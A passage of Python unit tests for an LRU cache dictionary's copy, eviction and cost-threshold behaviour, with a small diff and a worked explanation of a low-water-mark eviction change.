            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # Original should remain unchanged.
        self.assertEqual(d.totalcost, 6)
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

    def testcopyincreasecapacity(self):
        d = util.lrucachedict(5)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy(6)
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc['e'] = 've'
        dc['f'] = 'vf'
        for key in ('a', 'b', 'c', 'd', 'e', 'f'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc['g'] = 'vg'
        self.assertNotIn('a', dc)
        for key in ('b', 'c', 'd', 'e', 'f', 'g'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # Original should remain unchanged.
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

    def testpopoldest(self):
        d = util.lrucachedict(4)
        d.insert('a', 'va', cost=10)
        d.insert('b', 'vb', cost=5)

        self.assertEqual(len(d), 2)
        self.assertEqual(d.popoldest(), ('a', 'va'))
        self.assertEqual(len(d), 1)
        self.assertEqual(d.totalcost, 5)
        self.assertEqual(d.popoldest(), ('b', 'vb'))
        self.assertEqual(len(d), 0)
        self.assertEqual(d.totalcost, 0)
        self.assertIsNone(d.popoldest())

        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        self.assertEqual(d.popoldest(), ('a', 'va'))
        self.assertEqual(len(d), 3)
        for key in ('b', 'c', 'd'):
            self.assertEqual(d[key], 'v%s' % key)

        d['a'] = 'va'
        self.assertEqual(d.popoldest(), ('b', 'vb'))

    def testmaxcost(self):
        # Item cost is zero by default.
        d = util.lrucachedict(6, maxcost=10)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'
        self.assertEqual(len(d), 4)
        self.assertEqual(d.totalcost, 0)

        d.clear()

        # Insertion to exact cost threshold works without eviction.
        d.insert('a', 'va', cost=6)
        d.insert('b', 'vb', cost=4)

        self.assertEqual(len(d), 2)
        self.assertEqual(d['a'], 'va')
        self.assertEqual(d['b'], 'vb')

        # Inserting a new element with 0 cost works.
        d['c'] = 'vc'
        self.assertEqual(len(d), 3)

        # Inserting a new element with cost putting us above high
        # water mark evicts oldest single item.
        d.insert('d', 'vd', cost=1)
        self.assertEqual(len(d), 3)
        self.assertEqual(d.totalcost, 5)
        self.assertNotIn('a', d)
        for key in ('b', 'c', 'd'):
            self.assertEqual(d[key], 'v%s' % key)

        # Inserting a new element with enough room for just itself
        # evicts all items before.
        d.insert('e', 've', cost=10)
        self.assertEqual(len(d), 1)
        self.assertEqual(d.totalcost, 10)
        self.assertIn('e', d)

        # Inserting a new element with cost greater than threshold
        # still retains that item.
        d.insert('f', 'vf', cost=11)
        self.assertEqual(len(d), 1)
        self.assertEqual(d.totalcost, 11)
        self.assertIn('f', d)

        # Inserting a new element will evict the last item since it is
        # too large.
        d['g'] = 'vg'
        self.assertEqual(len(d), 1)
        self.assertEqual(d.totalcost, 0)
        self.assertIn('g', d)

        d.clear()

        d.insert('a', 'va', cost=7)
        d.insert('b', 'vb', cost=3)
        self.assertEqual(len(d), 2)

        # Replacing a value with smaller cost won't result in eviction.
        d.insert('b', 'vb2', cost=2)
        self.assertEqual(len(d), 2)

        # Replacing a value with a higher cost will evict when threshold
        # exceeded.
        d.insert('b', 'vb3', cost=4)
        self.assertEqual(len(d), 1)
        self.assertNotIn('a', d)

    def testmaxcostcomplex(self):
        d = util.lrucachedict(100, maxcost=100)
        d.insert('a', 'va', cost=9)
        d.insert('b', 'vb', cost=21)
        d.insert('c', 'vc', cost=7)
        d.insert('d', 'vd', cost=50)
        self.assertEqual(d.totalcost, 87)

        # Inserting new element should free multiple elements so we hit
        # low water mark.
        d.insert('e', 've', cost=25)
-       self.assertEqual(len(d), 3)
+       self.assertEqual(len(d), 2)
        self.assertNotIn('a', d)
        self.assertNotIn('b', d)
-       self.assertIn('c', d)
+       self.assertNotIn('c', d)
        self.assertIn('d', d)
        self.assertIn('e', d)

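The two rewritten assertions are the behavior change under review: when an insert pushes totalcost past maxcost, eviction no longer stops at the first node that brings the total back under the limit, but continues down to a lower water mark so a burst of inserts does not pay an eviction pass each time. A sketch of a policy consistent with the numbers in this test, assuming a 0.8 fraction (inferred from the test arithmetic, not quoted from util.py):

def evicttolowwater(cache, fraction=0.8):
    # Pop oldest nodes until totalcost drops to fraction * maxcost;
    # overshooting the limit amortizes the cost of repeated inserts.
    while len(cache) > 1 and cache.totalcost > cache.maxcost * fraction:
        cache.popoldest()

# maxcost=100, costs 9 + 21 + 7 + 50 = 87; inserting cost=25 gives 112.
# Evict 'a' (103), then 'b' (82); 82 > 80, so 'c' also goes (75),
# leaving only 'd' and 'e' -- hence len(d) == 2 and 'c' not in d above.
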
if __name__ == '__main__':
    silenttestrunner.main(__name__)